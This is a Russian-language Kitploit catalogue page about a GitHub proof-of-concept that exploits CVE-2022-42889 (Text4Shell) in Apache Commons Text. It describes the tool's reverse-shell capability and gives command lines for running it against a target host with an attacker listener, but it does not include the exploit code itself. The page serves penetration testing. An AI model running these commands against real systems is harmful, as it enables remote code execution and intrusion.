Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-42889-text4shell — Доказательство концепции (PoC) для CVE-2022-42889 (Text4Shell), нацеленное на версии Apache Commons Text до 1.10.0. Этот скрипт автоматизирует удалённое выполнение кода (RCE) через интерполяцию скриптов для установки обратной оболочки (reverse shell). Эта версия представляет собой структурированную оптимизацию оригинального эксплойта, опубликованного на Exploit-DB (ID: 52261). | Kitploit
Инструменты/GitHubGitHub/goultarde/cve-2022-42889-text4shell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubgoultarde/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Репозиторий
1 месяц назадЕщё не проверено

Доказательство концепции (PoC) для CVE-2022-42889 (Text4Shell), нацеленное на версии Apache Commons Text до 1.10.0. Этот скрипт автоматизирует удалённое выполнение кода (RCE) через интерполяцию скриптов для установки обратной оболочки (reverse shell). Эта версия представляет собой структурированную оптимизацию оригинального эксплойта, опубликованного на Exploit-DB (ID: 52261).

Поделиться

CVE-2022-42889-text4shell

Описание

Этот скрипт представляет собой инструмент для пентестинга, предназначенный для эксплуатации уязвимости CVE-2022-42889, также известной как Text4Shell, в Apache Commons Text (версии < 1.10.0). Он автоматизирует доставку Java-полезной нагрузки для запуска обратной оболочки.

Эта реализация основана на публичном эксплойте: https://www.exploit-db.com/exploits/52261

Возможности

  • Аргументы командной строки с использованием argparse для удобства использования.
  • Точное URL-кодирование для совместимости с Java-полезной нагрузкой.
  • Настраиваемый путь и параметры уязвимой цели.

Использование

Предварительные требования

Для работы скрипта требуются Python 3 и библиотека requests.

root@kitploit:~
pip install requests

Синтаксис

root@kitploit:~
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT

Пример

root@kitploit:~
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный данным скриптом.

Скачать инструмент